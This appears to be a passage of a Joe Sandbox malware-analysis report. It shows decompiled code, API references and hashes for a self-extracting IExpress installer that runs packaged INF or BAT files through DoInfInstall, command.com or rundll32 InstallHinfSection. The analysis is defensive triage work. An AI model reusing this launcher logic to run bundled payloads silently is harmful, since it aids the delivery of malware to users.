                                                                                                                                                                                                    								_pop(0);
                                                                                                                                                                                                    								goto L11;
                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                    								_v304 = 1;
                                                                                                                                                                                                    								L11:
                                                                                                                                                                                                    								_v300 = 0;
                                                                                                                                                                                                    								L14:
                                                                                                                                                                                                    								if(_t127 != 0) {
                                                                                                                                                                                                    									L27:
                                                                                                                                                                                                    									_t155 = 1;
                                                                                                                                                                                                    									__eflags = _t127 - 1;
                                                                                                                                                                                                    									if(_t127 != 1) {
                                                                                                                                                                                                    										L31:
                                                                                                                                                                                                    										_t132 =  &_v280;
                                                                                                                                                                                                    										_t76 = E00131AE8( &_v280,  &_v408,  &_v404); // executed
                                                                                                                                                                                                    										__eflags = _t76;
                                                                                                                                                                                                    										if(_t76 == 0) {
                                                                                                                                                                                                    											L62:
                                                                                                                                                                                                    											_t77 = 0;
                                                                                                                                                                                                    											L63:
                                                                                                                                                                                                    											_pop(_t150);
                                                                                                                                                                                                    											_pop(_t156);
                                                                                                                                                                                                    											_pop(_t128);
                                                                                                                                                                                                    											return E00136CE0(_t77, _t128, _v12 ^ _t164, _t146, _t150, _t156);
                                                                                                                                                                                                    										}
                                                                                                                                                                                                    										_t157 = _v404;
                                                                                                                                                                                                    										__eflags = _t149;
                                                                                                                                                                                                    										if(_t149 != 0) {
                                                                                                                                                                                                    											L37:
                                                                                                                                                                                                    											__eflags = _t157;
                                                                                                                                                                                                    											if(_t157 == 0) {
                                                                                                                                                                                                    												L57:
                                                                                                                                                                                                    												_t151 = _v408;
                                                                                                                                                                                                    												_t146 =  &_v352;
                                                                                                                                                                                                    												_t130 = _t151; // executed
                                                                                                                                                                                                    												_t79 = E00133FEF(_t130,  &_v352); // executed
                                                                                                                                                                                                    												__eflags = _t79;
                                                                                                                                                                                                    												if(_t79 == 0) {
                                                                                                                                                                                                    													L61:
                                                                                                                                                                                                    													LocalFree(_t151);
                                                                                                                                                                                                    													goto L62;
                                                                                                                                                                                                    												}
                                                                                                                                                                                                    												L58:
                                                                                                                                                                                                    												LocalFree(_t151);
                                                                                                                                                                                                    												_t127 = _t127 + 1;
                                                                                                                                                                                                    												_v396 = _t127;
                                                                                                                                                                                                    												__eflags = _t127 - 2;
                                                                                                                                                                                                    												if(_t127 >= 2) {
                                                                                                                                                                                                    													_t155 = 1;
                                                                                                                                                                                                    													__eflags = 1;
                                                                                                                                                                                                    													L69:
                                                                                                                                                                                                    													__eflags =  *0x138580;
                                                                                                                                                                                                    													if( *0x138580 != 0) {
                                                                                                                                                                                                    														E00132267();
                                                                                                                                                                                                    													}
                                                                                                                                                                                                    													_t77 = _t155;
                                                                                                                                                                                                    													goto L63;
                                                                                                                                                                                                    												}
                                                                                                                                                                                                    												_t153 = _v392;
                                                                                                                                                                                                    												_t149 = _v388;
                                                                                                                                                                                                    												continue;
                                                                                                                                                                                                    											}
                                                                                                                                                                                                    											L38:
                                                                                                                                                                                                    											__eflags =  *0x138180;
                                                                                                                                                                                                    											if( *0x138180 == 0) {
                                                                                                                                                                                                    												_t146 = 0x4c7;
                                                                                                                                                                                                    												E001344B9(0, 0x4c7, 0, 0, 0x10, 0);
                                                                                                                                                                                                    												LocalFree(_v424);
                                                                                                                                                                                                    												 *0x139124 = 0x8007042b;
                                                                                                                                                                                                    												goto L62;
                                                                                                                                                                                                    											}
                                                                                                                                                                                                    											__eflags = _t157;
                                                                                                                                                                                                    											if(_t157 == 0) {
                                                                                                                                                                                                    												goto L57;
                                                                                                                                                                                                    											}
                                                                                                                                                                                                    											__eflags =  *0x139a34 & 0x00000004;
                                                                                                                                                                                                    											if(__eflags == 0) {
                                                                                                                                                                                                    												goto L57;
                                                                                                                                                                                                    											}
                                                                                                                                                                                                    											_t129 = E00136495(_t127, _t132, _t157, __eflags);
                                                                                                                                                                                                    											__eflags = _t129;
                                                                                                                                                                                                    											if(_t129 == 0) {
                                                                                                                                                                                                    												_t146 = 0x4c8;
                                                                                                                                                                                                    												E001344B9(0, 0x4c8, "advpack.dll", 0, 0x10, 0);
                                                                                                                                                                                                    												L65:
                                                                                                                                                                                                    												LocalFree(_v408);
                                                                                                                                                                                                    												 *0x139124 = E00136285();
                                                                                                                                                                                                    												goto L62;
                                                                                                                                                                                                    											}
                                                                                                                                                                                                    											_t146 = GetProcAddress(_t129, "DoInfInstall");
                                                                                                                                                                                                    											_v404 = _t146;
                                                                                                                                                                                                    											__eflags = _t146;
                                                                                                                                                                                                    											if(_t146 == 0) {
														_t146 = 0x4c9;
														__eflags = 0;
														E001344B9(0, 0x4c9, "DoInfInstall", 0, 0x10, 0);
														FreeLibrary(_t129);
														goto L65;
													}
													__eflags =  *0x138a30;
													_t151 = _v408;
													_v384 = 0;
													_v368 =  &_v280;
													_t96 =  *0x139a40; // 0x3
													_v364 = _t96;
													_t97 =  *0x138a38 & 0x0000ffff;
													_v380 = 0x139154;
													_v376 = _t151;
													_v372 = 0x1391e4;
													_v360 = _t97;
													if( *0x138a30 != 0) {
														_t97 = _t97 | 0x00010000;
														__eflags = _t97;
														_v360 = _t97;
													}
													_t144 =  *0x139a34; // 0x1
													__eflags = _t144 & 0x00000008;
													if((_t144 & 0x00000008) != 0) {
														_t97 = _t97 | 0x00020000;
														__eflags = _t97;
														_v360 = _t97;
													}
													__eflags = _t144 & 0x00000010;
													if((_t144 & 0x00000010) != 0) {
														_t97 = _t97 | 0x00040000;
														__eflags = _t97;
														_v360 = _t97;
													}
													_t145 =  *0x138d48; // 0x0
													__eflags = _t145 & 0x00000040;
													if((_t145 & 0x00000040) != 0) {
														_t97 = _t97 | 0x00080000;
														__eflags = _t97;
														_v360 = _t97;
													}
													__eflags = _t145;
													if(_t145 < 0) {
														_t104 = _t97 | 0x00100000;
														__eflags = _t104;
														_v360 = _t104;
													}
													_t98 =  *0x139a38; // 0x0
													_v356 = _t98;
													_t130 = _t146;
													 *0x13a288( &_v384);
													_t101 = _v404();
													__eflags = _t164 - _t164;
													if(_t164 != _t164) {
														_t130 = 4;
														asm("int 0x29");
													}
													 *0x139124 = _t101;
													_push(_t129);
													__eflags = _t101;
													if(_t101 < 0) {
														FreeLibrary();
														goto L61;
													} else {
														FreeLibrary();
														_t127 = _v400;
														goto L58;
													}
												}
												__eflags =  *0x139a40 - 1; // 0x3
												if(__eflags == 0) {
													goto L37;
												}
												__eflags =  *0x138a20;
												if( *0x138a20 == 0) {
													goto L37;
												}
												__eflags = _t157;
												if(_t157 != 0) {
													goto L38;
												}
												_v388 = 1;
												E0013202A(_t146); // executed
												goto L37;
											}
											_t146 =  &_v280;
											_t108 = E0013468F("POSTRUNPROGRAM",  &_v280, 0x104);
											__eflags = _t108;
											if(_t108 == 0) {
												goto L25;
											}
											__eflags =  *0x138c42;
											if( *0x138c42 != 0) {
												goto L69;
											}
											_t112 = CompareStringA(0x7f, 1,  &_v280, 0xffffffff, "<None>", 0xffffffff);
											__eflags = _t112 == 0;
											if(_t112 == 0) {
												goto L69;
											}
											goto L31;
										}
										_t118 =  *0x138a38; // 0x0
										if(_t118 == 0) {
											L23:
											if(_t153 != 0) {
												goto L31;
											}
											_t146 =  &_v276;
											if(E0013468F("RUNPROGRAM",  &_v276, 0x104) != 0) {
												goto L27;
											}
											goto L25;
										}
										if((_t118 & 0x00000001) == 0) {
											__eflags = _t118 & 0x00000002;
											if((_t118 & 0x00000002) == 0) {
												goto L62;
											}
											_t140 = "USRQCMD";
											L20:
											_t146 =  &_v276;
											if(E0013468F(_t140,  &_v276, 0x104) == 0) {
												goto L25;
											}
											if(CompareStringA(0x7f, 1,  &_v276, 0xffffffff, "<None>", 0xffffffff) - 2 != 0xfffffffe) {
												_t153 = 1;
												_v388 = 1;
											}
											goto L23;
										}
										_t140 = "ADMQCMD";
										goto L20;
									}
								}
								L26:
								_push(_t130);
								_t146 = 0x104;
								E00131781( &_v276, 0x104, _t130, 0x138c42);
								goto L27;
							}
						}
						_t130 = "REBOOT";
						_t125 = E0013468F(_t130, 0x139a2c, 4);
						if(_t125 == 0 || _t125 > 4) {
							goto L25;
						} else {
							goto L3;
						}
					}
0x00133baa
0x00133bb0
0x00133bb7
0x00133bc0
0x00133bc2
0x00133bc9
0x00133bcb
0x00133bcf
0x00133bd3
0x00133bd9
0x00133bfd
0x00133bfd
                                                                                                                                                                                                    0x00133bff
                                                                                                                                                                                                    0x00133c03
                                                                                                                                                                                                    0x00133c03
                                                                                                                                                                                                    0x00133c11
                                                                                                                                                                                                    0x00133c16
                                                                                                                                                                                                    0x00133c19
                                                                                                                                                                                                    0x00133c28
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00133c30
                                                                                                                                                                                                    0x00133c39
                                                                                                                                                                                                    0x00133c40
                                                                                                                                                                                                    0x00133d13
                                                                                                                                                                                                    0x00133d15
                                                                                                                                                                                                    0x00133d21
                                                                                                                                                                                                    0x00133d26
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00133c4f
                                                                                                                                                                                                    0x00133c56
                                                                                                                                                                                                    0x00133c60
                                                                                                                                                                                                    0x00133c65
                                                                                                                                                                                                    0x00133c77
                                                                                                                                                                                                    0x00133c78
                                                                                                                                                                                                    0x00133c7c
                                                                                                                                                                                                    0x00133c7e
                                                                                                                                                                                                    0x00133c82
                                                                                                                                                                                                    0x00133c82
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00133c7c
                                                                                                                                                                                                    0x00133c67
                                                                                                                                                                                                    0x00133c69
                                                                                                                                                                                                    0x00133c6d
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00133c58
                                                                                                                                                                                                    0x00133c58
                                                                                                                                                                                                    0x00133c6e
                                                                                                                                                                                                    0x00133c6e
                                                                                                                                                                                                    0x00133c87
                                                                                                                                                                                                    0x00133c89
                                                                                                                                                                                                    0x00133d4d
                                                                                                                                                                                                    0x00133d4f
                                                                                                                                                                                                    0x00133d50
                                                                                                                                                                                                    0x00133d52
                                                                                                                                                                                                    0x00133d9e
                                                                                                                                                                                                    0x00133da8
                                                                                                                                                                                                    0x00133daf
                                                                                                                                                                                                    0x00133db4
                                                                                                                                                                                                    0x00133db6
                                                                                                                                                                                                    0x00133f4d
                                                                                                                                                                                                    0x00133f4d
                                                                                                                                                                                                    0x00133f4f
                                                                                                                                                                                                    0x00133f56
                                                                                                                                                                                                    0x00133f57
                                                                                                                                                                                                    0x00133f58
                                                                                                                                                                                                    0x00133f63
                                                                                                                                                                                                    0x00133f63
                                                                                                                                                                                                    0x00133dbc
                                                                                                                                                                                                    0x00133dc0
                                                                                                                                                                                                    0x00133dc2
                                                                                                                                                                                                    0x00133de6
                                                                                                                                                                                                    0x00133de6
                                                                                                                                                                                                    0x00133de8
                                                                                                                                                                                                    0x00133f0b
                                                                                                                                                                                                    0x00133f0b
                                                                                                                                                                                                    0x00133f0f
                                                                                                                                                                                                    0x00133f13
                                                                                                                                                                                                    0x00133f15
                                                                                                                                                                                                    0x00133f1a
                                                                                                                                                                                                    0x00133f1c
                                                                                                                                                                                                    0x00133f46
                                                                                                                                                                                                    0x00133f47
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00133f47
                                                                                                                                                                                                    0x00133f1e
                                                                                                                                                                                                    0x00133f1f
                                                                                                                                                                                                    0x00133f25
                                                                                                                                                                                                    0x00133f26
                                                                                                                                                                                                    0x00133f2a
                                                                                                                                                                                                    0x00133f2d
                                                                                                                                                                                                    0x00133fd9
                                                                                                                                                                                                    0x00133fd9
                                                                                                                                                                                                    0x00133fda
                                                                                                                                                                                                    0x00133fda
                                                                                                                                                                                                    0x00133fe1
                                                                                                                                                                                                    0x00133fe3
                                                                                                                                                                                                    0x00133fe3
                                                                                                                                                                                                    0x00133fe8
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00133fe8
                                                                                                                                                                                                    0x00133f33
                                                                                                                                                                                                    0x00133f37
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00133f37
                                                                                                                                                                                                    0x00133dee
                                                                                                                                                                                                    0x00133dee
                                                                                                                                                                                                    0x00133df5
                                                                                                                                                                                                    0x00133fad
                                                                                                                                                                                                    0x00133fb9
                                                                                                                                                                                                    0x00133fc2
                                                                                                                                                                                                    0x00133fc8
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00133fc8
                                                                                                                                                                                                    0x00133dfb
                                                                                                                                                                                                    0x00133dfd
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00133e03
                                                                                                                                                                                                    0x00133e0a
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00133e15
                                                                                                                                                                                                    0x00133e17
                                                                                                                                                                                                    0x00133e19
                                                                                                                                                                                                    0x00133f94
                                                                                                                                                                                                    0x00133fa4
                                                                                                                                                                                                    0x00133f7c
                                                                                                                                                                                                    0x00133f80
                                                                                                                                                                                                    0x00133f8b
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00133f8b
                                                                                                                                                                                                    0x00133e2c
                                                                                                                                                                                                    0x00133e30
                                                                                                                                                                                                    0x00133e34
                                                                                                                                                                                                    0x00133e36
                                                                                                                                                                                                    0x00133f69
                                                                                                                                                                                                    0x00133f6e
                                                                                                                                                                                                    0x00133f70
                                                                                                                                                                                                    0x00133f76
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00133f76
                                                                                                                                                                                                    0x00133e3c
                                                                                                                                                                                                    0x00133e43
                                                                                                                                                                                                    0x00133e47
                                                                                                                                                                                                    0x00133e52
                                                                                                                                                                                                    0x00133e56
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • memset.MSVCRT ref: 00133C11
                                                                                                                                                                                                    • CompareStringA.KERNEL32(0000007F,00000001,?,000000FF,<None>,000000FF,00000104,00000004), ref: 00133CDC
                                                                                                                                                                                                      • Part of subcall function 0013468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 001346A0
                                                                                                                                                                                                      • Part of subcall function 0013468F: SizeofResource.KERNEL32(00000000,00000000,?,00132D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 001346A9
                                                                                                                                                                                                      • Part of subcall function 0013468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 001346C3
                                                                                                                                                                                                      • Part of subcall function 0013468F: LoadResource.KERNEL32(00000000,00000000,?,00132D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 001346CC
                                                                                                                                                                                                      • Part of subcall function 0013468F: LockResource.KERNEL32(00000000,?,00132D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 001346D3
                                                                                                                                                                                                      • Part of subcall function 0013468F: memcpy_s.MSVCRT ref: 001346E5
                                                                                                                                                                                                      • Part of subcall function 0013468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 001346EF
                                                                                                                                                                                                    • CompareStringA.KERNEL32(0000007F,00000001,?,000000FF,<None>,000000FF,00000104,?,00138C42), ref: 00133D8F
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,DoInfInstall), ref: 00133E26
                                                                                                                                                                                                    • FreeLibrary.KERNEL32(00000000,?,00138C42), ref: 00133EFF
                                                                                                                                                                                                    • LocalFree.KERNEL32(?,?,?,?,00138C42), ref: 00133F1F
                                                                                                                                                                                                    • FreeLibrary.KERNEL32(00000000,?,00138C42), ref: 00133F40
                                                                                                                                                                                                    • LocalFree.KERNEL32(?,?,?,?,00138C42), ref: 00133F47
                                                                                                                                                                                                    • FreeLibrary.KERNEL32(00000000,DoInfInstall,00000000,00000010,00000000,?,00138C42), ref: 00133F76
                                                                                                                                                                                                    • LocalFree.KERNEL32(?,advpack.dll,00000000,00000010,00000000,?,?,?,00138C42), ref: 00133F80
                                                                                                                                                                                                    • LocalFree.KERNEL32(?,00000000,00000000,00000010,00000000,?,?,?,00138C42), ref: 00133FC2
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000002.00000002.382982435.0000000000131000.00000020.00000001.01000000.00000005.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000002.00000002.382948805.0000000000130000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                    • Associated: 00000002.00000002.382996409.0000000000138000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                    • Associated: 00000002.00000002.383006751.000000000013A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                    • Associated: 00000002.00000002.383006751.000000000013C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_130000_plct23La85.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Free$Resource$Local$Library$CompareFindString$AddressLoadLockProcSizeofmemcpy_smemset
                                                                                                                                                                                                    • String ID: <None>$ADMQCMD$C:\Users\user\AppData\Local\Temp\IXP002.TMP\$D$DoInfInstall$POSTRUNPROGRAM$REBOOT$RUNPROGRAM$SHOWWINDOW$USRQCMD$advpack.dll$nst0dum
                                                                                                                                                                                                    • API String ID: 1032054927-3864516837
                                                                                                                                                                                                    • Opcode ID: f2ce2d07e63b6ded107e72a052bcc78fc89a14be85dcf018404c14623893c183
                                                                                                                                                                                                    • Instruction ID: d30e356bbcd347a183af3612b9af76d01a797f4cafee5b4e1da0efe9518a9cfc
                                                                                                                                                                                                    • Opcode Fuzzy Hash: f2ce2d07e63b6ded107e72a052bcc78fc89a14be85dcf018404c14623893c183
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 79B1F6709043019FE724DF648845B6B77E8EF94710F500A2EF9A5E75A0DB70C984CB5A
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                    C-Code - Quality: 82%
                                                                                                                                                                                                    			E00131AE8(long __ecx, CHAR** _a4, int* _a8) {
                                                                                                                                                                                                    				signed int _v8;
                                                                                                                                                                                                    				char _v268;
                                                                                                                                                                                                    				char _v527;
                                                                                                                                                                                                    				char _v528;
                                                                                                                                                                                                    				char _v1552;
                                                                                                                                                                                                    				CHAR* _v1556;
                                                                                                                                                                                                    				int* _v1560;
                                                                                                                                                                                                    				CHAR** _v1564;
                                                                                                                                                                                                    				void* __ebx;
                                                                                                                                                                                                    				void* __edi;
                                                                                                                                                                                                    				void* __esi;
                                                                                                                                                                                                    				signed int _t48;
                                                                                                                                                                                                    				CHAR* _t53;
                                                                                                                                                                                                    				CHAR* _t54;
                                                                                                                                                                                                    				char* _t57;
                                                                                                                                                                                                    				char* _t58;
                                                                                                                                                                                                    				CHAR* _t60;
                                                                                                                                                                                                    				void* _t62;
                                                                                                                                                                                                    				signed char _t65;
                                                                                                                                                                                                    				intOrPtr _t76;
                                                                                                                                                                                                    				intOrPtr _t77;
                                                                                                                                                                                                    				unsigned int _t85;
                                                                                                                                                                                                    				CHAR* _t90;
                                                                                                                                                                                                    				CHAR* _t92;
                                                                                                                                                                                                    				char _t105;
                                                                                                                                                                                                    				char _t106;
                                                                                                                                                                                                    				CHAR** _t111;
                                                                                                                                                                                                    				CHAR* _t115;
                                                                                                                                                                                                    				intOrPtr* _t125;
                                                                                                                                                                                                    				void* _t126;
                                                                                                                                                                                                    				CHAR* _t132;
                                                                                                                                                                                                    				CHAR* _t135;
                                                                                                                                                                                                    				void* _t138;
                                                                                                                                                                                                    				void* _t139;
                                                                                                                                                                                                    				void* _t145;
                                                                                                                                                                                                    				intOrPtr* _t146;
                                                                                                                                                                                                    				char* _t148;
                                                                                                                                                                                                    				CHAR* _t151;
                                                                                                                                                                                                    				void* _t152;
                                                                                                                                                                                                    				CHAR* _t155;
                                                                                                                                                                                                    				CHAR* _t156;
                                                                                                                                                                                                    				void* _t157;
                                                                                                                                                                                                    				signed int _t158;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				_t48 =  *0x138004; // 0xe764604f
                                                                                                                                                                                                    				_v8 = _t48 ^ _t158;
                                                                                                                                                                                                    				_t108 = __ecx;
                                                                                                                                                                                                    				_v1564 = _a4;
                                                                                                                                                                                                    				_v1560 = _a8;
                                                                                                                                                                                                    				E00131680( &_v528, 0x104, __ecx);
                                                                                                                                                                                                    				if(_v528 != 0x22) {
                                                                                                                                                                                                    					_t135 = " ";
                                                                                                                                                                                                    					_t53 =  &_v528;
                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                    					_t135 = "\"";
                                                                                                                                                                                                    					_t53 =  &_v527;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				_t111 =  &_v1556;
                                                                                                                                                                                                    				_v1556 = _t53;
                                                                                                                                                                                                    				_t54 = E00131A84(_t111, _t135);
                                                                                                                                                                                                    				_t156 = _v1556;
                                                                                                                                                                                                    				_t151 = _t54;
                                                                                                                                                                                                    				if(_t156 == 0) {
                                                                                                                                                                                                    					L12:
                                                                                                                                                                                                    					_push(_t111);
                                                                                                                                                                                                    					E00131781( &_v268, 0x104, _t111, "C:\Users\hardz\AppData\Local\Temp\IXP002.TMP\");
                                                                                                                                                                                                    					E0013658A( &_v268, 0x104, _t156);
                                                                                                                                                                                                    					goto L13;
                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                    					_t132 = _t156;
                                                                                                                                                                                                    					_t148 =  &(_t132[1]);
                                                                                                                                                                                                    					do {
                                                                                                                                                                                                    						_t105 =  *_t132;
                                                                                                                                                                                                    						_t132 =  &(_t132[1]);
                                                                                                                                                                                                    					} while (_t105 != 0);
                                                                                                                                                                                                    					_t111 = _t132 - _t148;
                                                                                                                                                                                                    					if(_t111 < 3) {
                                                                                                                                                                                                    						goto L12;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					_t106 = _t156[1];
                                                                                                                                                                                                    					if(_t106 != 0x3a || _t156[2] != 0x5c) {
                                                                                                                                                                                                    						if( *_t156 != 0x5c || _t106 != 0x5c) {
                                                                                                                                                                                                    							goto L12;
                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                    							goto L11;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                    						L11:
                                                                                                                                                                                                    						E00131680( &_v268, 0x104, _t156);
                                                                                                                                                                                                    						L13:
                                                                                                                                                                                                    						_t138 = 0x2e;
                                                                                                                                                                                                    						_t57 = E001366C8(_t156, _t138);
                                                                                                                                                                                                    						if(_t57 == 0 || CompareStringA(0x7f, 1, _t57, 0xffffffff, ".INF", 0xffffffff) != 0) {
                                                                                                                                                                                                    							_t139 = 0x2e;
                                                                                                                                                                                                    							_t115 = _t156;
                                                                                                                                                                                                    							_t58 = E001366C8(_t115, _t139);
                                                                                                                                                                                                    							if(_t58 == 0 || CompareStringA(0x7f, 1, _t58, 0xffffffff, ".BAT", 0xffffffff) != 0) {
                                                                                                                                                                                                    								_t156 = LocalAlloc(0x40, 0x400);
                                                                                                                                                                                                    								if(_t156 == 0) {
									goto L43;
								}
								_t65 = GetFileAttributesA( &_v268); // executed
								if(_t65 == 0xffffffff || (_t65 & 0x00000010) != 0) {
									E00131680( &_v1552, 0x400, _t108);
								} else {
									_push(_t115);
									_t108 = 0x400;
									E00131781( &_v1552, 0x400, _t115,  &_v268);
									if(_t151 != 0 &&  *_t151 != 0) {
										E001316B3( &_v1552, 0x400, " ");
										E001316B3( &_v1552, 0x400, _t151);
									}
								}
								_t140 = _t156;
								 *_t156 = 0;
								E00132AAC( &_v1552, _t156, _t156);
								goto L53;
							} else {
								_t108 = "Command.com /c %s";
								_t125 = "Command.com /c %s";
								_t145 = _t125 + 1;
								do {
									_t76 =  *_t125;
									_t125 = _t125 + 1;
								} while (_t76 != 0);
								_t126 = _t125 - _t145;
								_t146 =  &_v268;
								_t157 = _t146 + 1;
								do {
									_t77 =  *_t146;
									_t146 = _t146 + 1;
								} while (_t77 != 0);
								_t140 = _t146 - _t157;
								_t154 = _t126 + 8 + _t146 - _t157;
								_t156 = LocalAlloc(0x40, _t126 + 8 + _t146 - _t157);
								if(_t156 != 0) {
									E0013171E(_t156, _t154, "Command.com /c %s",  &_v268);
									goto L53;
								}
								goto L43;
							}
						} else {
							_t85 = GetFileAttributesA( &_v268);
							if(_t85 == 0xffffffff || ( !(_t85 >> 4) & 0x00000001) == 0) {
								_t140 = 0x525;
								_push(0);
								_push(0x10);
								_push(0);
								_t60 =  &_v268;
								goto L35;
							} else {
								_t140 = "[";
								_v1556 = _t151;
								_t90 = E00131A84( &_v1556, "[");
								if(_t90 != 0) {
									if( *_t90 != 0) {
										_v1556 = _t90;
									}
									_t140 = "]";
									E00131A84( &_v1556, "]");
								}
								_t156 = LocalAlloc(0x40, 0x200);
								if(_t156 == 0) {
									L43:
									_t60 = 0;
									_t140 = 0x4b5;
									_push(0);
									_push(0x10);
									_push(0);
									L35:
									_push(_t60);
									E001344B9(0, _t140);
									_t62 = 0;
									goto L54;
								} else {
									_t155 = _v1556;
									_t92 = _t155;
									if( *_t155 == 0) {
										_t92 = "DefaultInstall";
									}
									 *0x139120 = GetPrivateProfileIntA(_t92, "Reboot", 0,  &_v268);
									 *_v1560 = 1;
									if(GetPrivateProfileStringA("Version", "AdvancedINF", 0x131140, _t156, 8,  &_v268) == 0) {
										 *0x139a34 =  *0x139a34 & 0xfffffffb;
										if( *0x139a40 != 0) {
											_t108 = "setupapi.dll";
										} else {
											_t108 = "setupx.dll";
											GetShortPathNameA( &_v268,  &_v268, 0x104);
										}
										if( *_t155 == 0) {
											_t155 = "DefaultInstall";
										}
										_push( &_v268);
										_push(_t155);
										E0013171E(_t156, 0x200, "rundll32.exe %s,InstallHinfSection %s 128 %s", _t108);
									} else {
										 *0x139a34 =  *0x139a34 | 0x00000004;
										if( *_t155 == 0) {
											_t155 = "DefaultInstall";
										}
										E00131680(_t108, 0x104, _t155);
										_t140 = 0x200;
										E00131680(_t156, 0x200,  &_v268);
									}
									L53:
									_t62 = 1;
									 *_v1564 = _t156;
									L54:
									_pop(_t152);
									return E00136CE0(_t62, _t108, _v8 ^ _t158, _t140, _t152, _t156);
								}
							}
						}
					}
				}
			}
                                                                                                                                                                                                    0x00131bcc
                                                                                                                                                                                                    0x00131bd3
                                                                                                                                                                                                    0x00131d75
                                                                                                                                                                                                    0x00131d76
                                                                                                                                                                                                    0x00131d78
                                                                                                                                                                                                    0x00131d7f
                                                                                                                                                                                                    0x00131e05
                                                                                                                                                                                                    0x00131e09
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00131e12
                                                                                                                                                                                                    0x00131e1b
                                                                                                                                                                                                    0x00131e73
                                                                                                                                                                                                    0x00131e21
                                                                                                                                                                                                    0x00131e21
                                                                                                                                                                                                    0x00131e28
                                                                                                                                                                                                    0x00131e37
                                                                                                                                                                                                    0x00131e3e
                                                                                                                                                                                                    0x00131e52
                                                                                                                                                                                                    0x00131e60
                                                                                                                                                                                                    0x00131e60
                                                                                                                                                                                                    0x00131e3e
                                                                                                                                                                                                    0x00131e79
                                                                                                                                                                                                    0x00131e7b
                                                                                                                                                                                                    0x00131e84
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00131d9b
                                                                                                                                                                                                    0x00131d9b
                                                                                                                                                                                                    0x00131da0
                                                                                                                                                                                                    0x00131da2
                                                                                                                                                                                                    0x00131da5
                                                                                                                                                                                                    0x00131da5
                                                                                                                                                                                                    0x00131da7
                                                                                                                                                                                                    0x00131da8
                                                                                                                                                                                                    0x00131dac
                                                                                                                                                                                                    0x00131dae
                                                                                                                                                                                                    0x00131db4
                                                                                                                                                                                                    0x00131db7
                                                                                                                                                                                                    0x00131db7
                                                                                                                                                                                                    0x00131db9
                                                                                                                                                                                                    0x00131dba
                                                                                                                                                                                                    0x00131dbe
                                                                                                                                                                                                    0x00131dc3
                                                                                                                                                                                                    0x00131dce
                                                                                                                                                                                                    0x00131dd2
                                                                                                                                                                                                    0x00131deb
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00131df0
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00131dd2
                                                                                                                                                                                                    0x00131bf7
                                                                                                                                                                                                    0x00131bfe
                                                                                                                                                                                                    0x00131c07
                                                                                                                                                                                                    0x00131d55
                                                                                                                                                                                                    0x00131d5a
                                                                                                                                                                                                    0x00131d5b
                                                                                                                                                                                                    0x00131d5d
                                                                                                                                                                                                    0x00131d5e
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00131c1b
                                                                                                                                                                                                    0x00131c1b
                                                                                                                                                                                                    0x00131c20
                                                                                                                                                                                                    0x00131c2c
                                                                                                                                                                                                    0x00131c33
                                                                                                                                                                                                    0x00131c38
                                                                                                                                                                                                    0x00131c3a
                                                                                                                                                                                                    0x00131c3a
                                                                                                                                                                                                    0x00131c40
                                                                                                                                                                                                    0x00131c4b
                                                                                                                                                                                                    0x00131c4b
                                                                                                                                                                                                    0x00131c5d
                                                                                                                                                                                                    0x00131c61
                                                                                                                                                                                                    0x00131dd4
                                                                                                                                                                                                    0x00131dd4
                                                                                                                                                                                                    0x00131dd6
                                                                                                                                                                                                    0x00131ddb
                                                                                                                                                                                                    0x00131ddc
                                                                                                                                                                                                    0x00131dde
                                                                                                                                                                                                    0x00131d64
                                                                                                                                                                                                    0x00131d64
                                                                                                                                                                                                    0x00131d67
                                                                                                                                                                                                    0x00131d6c
                                                                                                                                                                                                    0x00000000
